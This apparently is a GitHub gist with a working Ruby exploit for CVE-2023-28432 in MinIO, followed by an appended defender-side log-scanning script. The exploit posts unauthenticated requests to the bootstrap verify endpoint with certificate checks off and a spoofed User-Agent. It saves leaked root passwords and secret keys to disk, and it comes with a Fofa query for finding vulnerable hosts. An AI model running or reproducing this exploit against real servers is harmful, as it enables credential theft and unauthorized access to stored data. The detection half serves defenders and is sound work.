@komodoooo
Last active June 24, 2023 18:53
CVE-2023-28432 exploit
require 'http'    # http.rb gem
require 'openssl'

puts <<~BANNER

  CVE-2023-28432
  MinIO information disclosure exploit
  By komodo

BANNER

=begin
Fofa query to search vulnerable targets:
body="Temporary Redirect" && header="307 Temporary Redirect" && header="Location: http://" && server="elb"
=end

$cont = 1
$dirname = "Minio_dump"

# Create the dump directory and chdir into it. If the name is already taken,
# retry with a numeric suffix (Minio_dump-2, Minio_dump-3, ...).
def dir(name = $dirname)
  Dir.mkdir(name)
  Dir.chdir(name)
rescue Errno::EEXIST
  $cont += 1
  dir("#{$dirname}-#{$cont}")
end

def main(url)
  url = url.delete_suffix("/")
  # Targets often run with self-signed certificates, so certificate
  # verification is disabled for this probe.
  ctx = OpenSSL::SSL::SSLContext.new
  ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE
  headerz = { # https://user-agents.net/random
    "User-Agent" => "Mozilla/5.0 (Linux; Android 7.1.1; K88) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.104 Safari/537.36",
    "Content-Type" => "application/x-www-form-urlencoded"
  }
  # Unauthenticated POST to the cluster bootstrap verification endpoint.
  # A vulnerable MinIO answers 200 with its environment variables, which
  # include MINIO_ROOT_PASSWORD / MINIO_SECRET_KEY.
  r = HTTP.post("#{url}/minio/bootstrap/v1/verify", ssl_context: ctx, headers: headerz)
  body = r.body.to_s
  if r.code == 200 && body.match?(/MINIO_ROOT_PASSWORD|MINIO_SECRET_KEY/)
    dir
    # File.write opens, writes and closes, so the dump is flushed to disk.
    File.write("!target.txt", url)
    File.write("dump.json", body)
    puts "\n#{body.gsub(",", ",\n")}\nSaved on '#{File.basename(Dir.pwd)}/dump.json' file.\n"
  else
    puts "Not vulnerable! :(\n"
  end
end

begin
  print "Base URL: "
  main(gets.chomp)
rescue => e
  abort(e.to_s)
end
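A defender-side counterpart to the probe above, added here as an example and not part of komodo's gist or of MinIO itself. The script's only observable footprint on the target is an unauthenticated POST to /minio/bootstrap/v1/verify, an endpoint meant for cluster peers; so the check that matters in logs is "POST to that path from an address that is not a cluster node", with a 200 status meaning the environment was actually handed out. The log format and every log line below are constructed for the example (an nginx-style combined format in front of MinIO is assumed; adapt LOG_RE to whatever actually fronts the deployment), and the peer User-Agent strings are illustrative, not MinIO's real ones.

```ruby
require 'set'

# Constructed combined-style access-log line: client ip, timestamp, request
# line, status, bytes, referer, user agent. Assumption for this example only.
LOG_RE = /\A(?<ip>\S+) \S+ \S+ \[(?<ts>[^\]]+)\] "(?<method>[A-Z]+) (?<path>\S+) [^"]*" (?<status>\d{3}) \d+ "[^"]*" "(?<ua>[^"]*)"\z/

BOOTSTRAP_VERIFY = "/minio/bootstrap/v1/verify"

# Constructed sample: two bootstrap calls between cluster peers, one probe from
# an outside address that received a 200, unrelated traffic, and a probe that
# was refused with 403.
SAMPLE_LOG = <<~LOG
  10.0.1.11 - - [24/Jun/2023:18:40:01 +0000] "POST /minio/bootstrap/v1/verify HTTP/1.1" 200 512 "-" "minio-peer/illustrative"
  10.0.1.12 - - [24/Jun/2023:18:40:01 +0000] "POST /minio/bootstrap/v1/verify HTTP/1.1" 200 512 "-" "minio-peer/illustrative"
  203.0.113.7 - - [24/Jun/2023:18:53:10 +0000] "POST /minio/bootstrap/v1/verify HTTP/1.1" 200 512 "-" "Mozilla/5.0 (Linux; Android 7.1.1; K88) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.104 Safari/537.36"
  203.0.113.7 - - [24/Jun/2023:18:53:12 +0000] "GET /minio/health/live HTTP/1.1" 200 0 "-" "curl/8.1.2"
  198.51.100.4 - - [24/Jun/2023:18:55:00 +0000] "POST /minio/bootstrap/v1/verify HTTP/1.1" 403 42 "-" "python-requests/2.31"
LOG

Finding = Struct.new(:ip, :ts, :status, :ua, :severity)

# Flag every POST to the bootstrap verify endpoint that did not come from a
# known cluster peer. A 200 from an unknown source is critical: on an
# unpatched build the response carried the root credentials. Anything else
# (403, 404, ...) is still a probe worth noting.
def find_bootstrap_probes(log_text, cluster_peers)
  peers = Set.new(cluster_peers)
  log_text.each_line.filter_map do |line|
    m = LOG_RE.match(line.chomp) or next
    next unless m[:method] == "POST" && m[:path].split("?").first == BOOTSTRAP_VERIFY
    next if peers.include?(m[:ip])
    severity = m[:status] == "200" ? :critical : :suspicious
    Finding.new(m[:ip], m[:ts], m[:status].to_i, m[:ua], severity)
  end
end

if __FILE__ == $0
  find_bootstrap_probes(SAMPLE_LOG, %w[10.0.1.11 10.0.1.12]).each do |f|
    puts "#{f.severity.to_s.upcase} #{f.ts} #{f.ip} -> #{f.status} (#{f.ua})"
  end
end
```

Run it with the cluster node addresses as the peer list; with an empty peer list every bootstrap call is reported, which is the right setting for a single-node deployment where no peer should ever call the endpoint. A critical finding on a build older than the fix means the root credentials must be rotated, not just the host patched.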